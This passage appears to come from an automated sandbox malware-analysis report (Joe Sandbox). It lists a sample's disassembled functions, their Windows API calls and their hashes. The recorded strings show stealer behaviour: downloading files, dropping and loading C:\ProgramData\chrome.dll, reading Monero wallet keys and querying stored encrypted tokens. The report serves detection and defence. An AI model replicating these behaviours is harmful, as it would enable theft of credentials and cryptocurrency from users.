                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                              • String ID: D
                              • API String ID: 3242155833-2746444292
                              • Opcode ID: 68637387f5ae4dfde11cd40b328e78281b55ec7a1092ab539510dd5e28db6220
                              • Instruction ID: 5c1d39e0f86f4a2b4078ecf00ede224b669a095c507eed220cba1bc4c2242f2d
                              • Opcode Fuzzy Hash: 68637387f5ae4dfde11cd40b328e78281b55ec7a1092ab539510dd5e28db6220
                              • Instruction Fuzzy Hash: BA51C7B1944308ABEB24DB60DC5AFDA7378AF44704F00459EB20DAB2C1EB75AB84CF55
                              Function 004C60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                              • InternetOpenA.WININET(004E0DFB,00000001,00000000,00000000,00000000), ref: 004C615F
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6197
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004C61DF
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004C6203
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 004C622C
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004C625A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 004C6299
                              • InternetCloseHandle.WININET(?), ref: 004C62A3
                              • InternetCloseHandle.WININET(00000000), ref: 004C62B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 754132e2a591285d70700edf7340e22fb96ea10e9cd4d3b1e7d2fb95c6d59792
                              • Instruction ID: df16cac50fc0230be5d0811b15678adbcb558289014007f5a5840150a47dffbe
                              • Opcode Fuzzy Hash: 754132e2a591285d70700edf7340e22fb96ea10e9cd4d3b1e7d2fb95c6d59792
                              • Instruction Fuzzy Hash: 755194B5A40208ABDB64DF90CC55FEE7779AB44305F00809EF605A72C0DB786A86CF5D
                              Function 0054012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • type_info::operator==.LIBVCRUNTIME ref: 0054024D
                              • ___TypeMatch.LIBVCRUNTIME ref: 0054035B
                              • CatchIt.LIBVCRUNTIME ref: 005403AC
                              • CallUnexpected.LIBVCRUNTIME ref: 005404C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2356445960-393685449
                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction ID: 1caf5f7f1c8cee4401d004a615dd97088df947b45fcd18405c135e96f5692856
                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction Fuzzy Hash: 5CB19D35C0020AEFCF15DFA4C8899EEBFB4BF54318F20555AEA116B292D370DA51CB91
                              Function 004CBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • lstrlen.KERNEL32(00000000), ref: 004CBC6F
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 004CBC9D
                              • lstrlen.KERNEL32(00000000), ref: 004CBD75
                              • lstrlen.KERNEL32(00000000), ref: 004CBD89
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: e80bc3f631282e6ee657ab0d2a00fc0b87f427d1212454ac7d6ed3dc02f23951
                              • Instruction ID: f046a2f6fd61861a8003e33697223dae00fba9ecaa7ca721405421786f5ebb24
                              • Opcode Fuzzy Hash: e80bc3f631282e6ee657ab0d2a00fc0b87f427d1212454ac7d6ed3dc02f23951
                              • Instruction Fuzzy Hash: 4AB150719101089BCB04EBA1CCB6EEE7379AF14304F40455FF506632A1EF386A59CB6A
                              Function 004D6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 54046e8f13c9ff462f7f0af78c63c5d5ae8fd66193755f6963fc62e0d172803a
                              • Instruction ID: a92432c64e77efd34c7729d5c28b397ca56f9838662416ea5b3f77a5d165f78d
                              • Opcode Fuzzy Hash: 54046e8f13c9ff462f7f0af78c63c5d5ae8fd66193755f6963fc62e0d172803a
                              • Instruction Fuzzy Hash: BDF05E3099C209EFD3489FE0EA0A75CBB30EB45707F118197F74996290C6784A51DB5D
                              Function 004D08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004D08DC,C:\ProgramData\chrome.dll), ref: 004D9871
                                • Part of subcall function 004CA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004CA098
                              • StrCmpCA.SHLWAPI(00000000,012A90A8), ref: 004D0922
                              • StrCmpCA.SHLWAPI(00000000,012A8F58), ref: 004D0B79
                              • StrCmpCA.SHLWAPI(00000000,012A8FB8), ref: 004D0A0C
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004D0C35
                              Strings
                              • C:\ProgramData\chrome.dll, xrefs: 004D08CD
                              • C:\ProgramData\chrome.dll, xrefs: 004D0C30
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                              • API String ID: 585553867-663540502
                              • Opcode ID: 79c3b8216209de838acf505be7a375329b81cbdbae1a02c3acad3735275bbef9
                              • Instruction ID: 1eab2907a7dc06f25d8895c0bc8860f824c84d6260511216358760c135c24c97
                              • Opcode Fuzzy Hash: 79c3b8216209de838acf505be7a375329b81cbdbae1a02c3acad3735275bbef9
                              • Instruction Fuzzy Hash: 03A185717002089FCB18EF65C9A6FAD77B6AF95304F10816FE40A4F351DA34DA0ACB96
                              Function 0053F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 0053FA1F
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0053FA27
                              • _ValidateLocalCookies.LIBCMT ref: 0053FAB0
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0053FADB
                              • _ValidateLocalCookies.LIBCMT ref: 0053FB30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction ID: 93913716d11c6fb11c32b9547325f16d0e7b7d5b60b07bb34256aee8731fb639
                              • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction Fuzzy Hash: A2419071E00219EBCF10DF68C884A9EBFB5BF49324F1485A5E918AB392D7319A15CB91
                              Function 004C5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004C501A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C5021
                              • InternetOpenA.WININET(004E0DE3,00000000,00000000,00000000,00000000), ref: 004C503A
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004C5061
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004C5091
                              • InternetCloseHandle.WININET(?), ref: 004C5109
                              • InternetCloseHandle.WININET(?), ref: 004C5116
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 06666f7777a51740f19200239db63e5cc7316e80cfaba72be7359553514e5858
                              • Instruction ID: 32e45532d11451b0873104c458a9687f38e3711260854ef1de05e054b5a276bc
                              • Opcode Fuzzy Hash: 06666f7777a51740f19200239db63e5cc7316e80cfaba72be7359553514e5858
                              • Instruction Fuzzy Hash: 4D31F7B4A4421CABDB24CF54DC85BDDB7B4AB48304F1081DAFA09A7281D7746AC6CF9D
                              Function 004D8290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012AE260,00000000,?,004E0E14,00000000,?,00000000), ref: 004D82C0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D82C7
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004D82E8
                              • wsprintfA.USER32 ref: 004D833C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: 21a748e6aaed8393dd0bf250bb2814f90daa4baa6c030482d9b85dba278779a9
                              • Instruction ID: 8d43dedb618b4e33564ede8dad5b5e65e453a554552ef873ec2186b2cbbb13e4
                              • Opcode Fuzzy Hash: 21a748e6aaed8393dd0bf250bb2814f90daa4baa6c030482d9b85dba278779a9
                              • Instruction Fuzzy Hash: 52214AB1E54208ABDB04DFD5CC4AFAEB7B8FB44B04F10450AF615BB280C77D69018BA9
                              Function 004D856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004D85B6
                              • wsprintfA.USER32 ref: 004D85E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004D860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8629
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • RegQueryValueExA.ADVAPI32(00000000,012AE398,00000000,000F003F,?,00000400), ref: 004D867C
                              • lstrlen.KERNEL32(?), ref: 004D8691
                              • RegQueryValueExA.ADVAPI32(00000000,012AE368,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,004E0B3C), ref: 004D8729
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8798
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D87AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
